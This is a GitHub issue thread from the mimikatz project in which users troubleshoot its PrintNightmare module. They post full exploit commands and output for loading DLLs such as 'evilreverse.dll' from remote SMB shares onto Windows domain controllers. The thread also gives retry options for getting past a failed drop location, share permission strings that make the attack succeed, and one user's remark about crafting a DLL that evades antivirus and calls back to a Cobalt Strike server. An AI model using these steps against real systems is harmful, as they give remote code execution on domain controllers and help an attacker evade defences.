Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[ERROR] kuhl_m_misc_printnightmare_CallAddPrinterDriverEx #357

Open
sujit opened this issue Jul 1, 2021 · 12 comments
Open

[ERROR] kuhl_m_misc_printnightmare_CallAddPrinterDriverEx #357

sujit opened this issue Jul 1, 2021 · 12 comments

Comments

@sujit
Copy link

sujit commented Jul 1, 2021
edited
Loading

While trying to reproduce the printnightmare bug, I am coming across with an error condition. As per the wireshark packet traces, for the AddPrinterDriverEx DCERPC call I don't see any potential error (screenshot attached below) though.

Any idea, if I missing something here?

mimikatz exec:

mimikatz # misc::printnightmare /server:172.16.1.254 /library:\\172.16.1.40\share\calc.dll
| Remote    : 172.16.1.254
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\unidrv.dll
| DataFile  : \\172.16.1.40\share\calc.dll (calc.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 5

mimikatz #

Wireshark:

wireshark
@sujit
Copy link
Author

sujit commented Jul 1, 2021

Target OS: Windows Server 2016 Datacenter (Domain Controller)

@7MinSec
Copy link

7MinSec commented Jul 1, 2021

Hi @sujit , I've only played with this recently so I'm certainly no expert. However, I found the same behavior you described when my DLL payload was getting eaten by AV. I finally crafted one that did evade AV, and when that happens, the last line of output says:

ConfigFile: c:\some\path\name-of-your-DLL.dll - OK!

And then I found that my DLL executed and called home to my Cobalt Strike server.

@haim-n
Copy link

haim-n commented Jul 1, 2021

I'm getting the same CallAddPrinterDriverEx error, against both 2016 and 2019 DCs, with both having their AV disabled.

Would love to hear if anyone has some insights or suggestions.

Thanks!

@Ug0Security
Copy link

can you confirm that the serv can reach the share without credentials ?

@sujit
Copy link
Author

sujit commented Jul 2, 2021

FYI, I am able to access the anonymous share records from the DC box without any authentications in-place. However, this time I see another error, but pretty much similar (error code value changed this time) though:

Just curious, if at all someone has the PCAP (when the exploit actually worked), would anyone mind sharing the same? That could help me understand what might be going wrong under the hood.

mimikatz # misc::printnightmare /server:172.16.1.254 /library:\\172.16.1.15\smb\evilreverse.dll
| Remote    : 172.16.1.254
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\unidrv.dll
| DataFile  : \\172.16.1.15\smb\evilreverse.dll (evilreverse.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\evilreverse.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 3

mimikatz #

@Ug0Security ^^^

@Sh0ckFR
Copy link

Sh0ckFR commented Jul 2, 2021
edited
Loading

I have the same issue on a Windows 10 without AV in a VM, I checked the code a bit, and I think 1 condition here is probably the issue (the share folder is available without credentials):

mimikatz/mimikatz/modules/kuhl_m_misc.c

Line 1439 in c212760

if(kuhl_m_misc_printnightmare_CallAddPrinterDriverEx(szSystem32, &DriverInfo, 0, szKernelBase) == ERROR_SUCCESS)

Btw I like spaghetti :p

@gentilkiwi
Copy link
Owner

gentilkiwi commented Jul 2, 2021
edited
Loading

the share folder is available without credentials

If you have this in your capture (between AddPrinterDriverEx request and response), this is because of a not anonymous accessible remote share

image

+, the "poc" is for fresh system without previous attempt, you can have better result by adding /try:50 by eg.

Example with previous attempt(s) of another POC

  .#####.   mimikatz 2.2.0 (x64) #19041 Jul  1 2021 03:17:37
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # misc::printnightmare /server:dc.lab.local /library:\\hack.lab.local\security\mimilib.dll /try:10
| Remote    : dc.lab.local
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\unidrv.dll
| DataFile  : \\hack.lab.local\security\mimilib.dll (mimilib.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
 | Trying    : 3 to 10
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\3\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\4\mimilib.dll - OK!

mimikatz(commandline) # exit
Bye!

@rezasarvani
Copy link

Having the same problem with anonymous accessible share and vulnerable DC
Capture

@muxueo
Copy link

muxueo commented Jul 4, 2021

Have you solved this problem

@citronneur
Copy link

citronneur commented Jul 5, 2021
edited
Loading

I think cube0x0/CVE-2021-1675#25 can solve the issue. Soletimes backup folder is cleanup properly, using this solution we can perform rce without bruteforcing the backup folder. It’s more stable.

@haibara3839
Copy link

can you tell me where is calc.dll?
how to make the calc.dll?

@hitem
Copy link

hitem commented Jul 8, 2021
edited
Loading

So, i had this issue and have been trying to solve it for a few days. Im now able to reproduce the issue and consistently repair it.
I dont know what causes this. However, every time i create a folder and share it, the ICACLS of it is not 100% identical to the one that originally worked. So by exporting ICACLS and comparing and then restoring the functional one to every other directory i tried, it works.

If it helps anyone else, feel free to try:

2
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;OICIIOID;SDGXGWGR;;;AU)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU)
2\mimidrv.sys
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimikatz.exe
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimilib.dll
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimispool.dll
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)

To restore it, go one step up in folder structure from \2\ and run: (in my case C:\SEC\2 would be C:\SEC)
icacls C:\SEC /restore C:\SEC\rightsbackup.txt /t /c

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests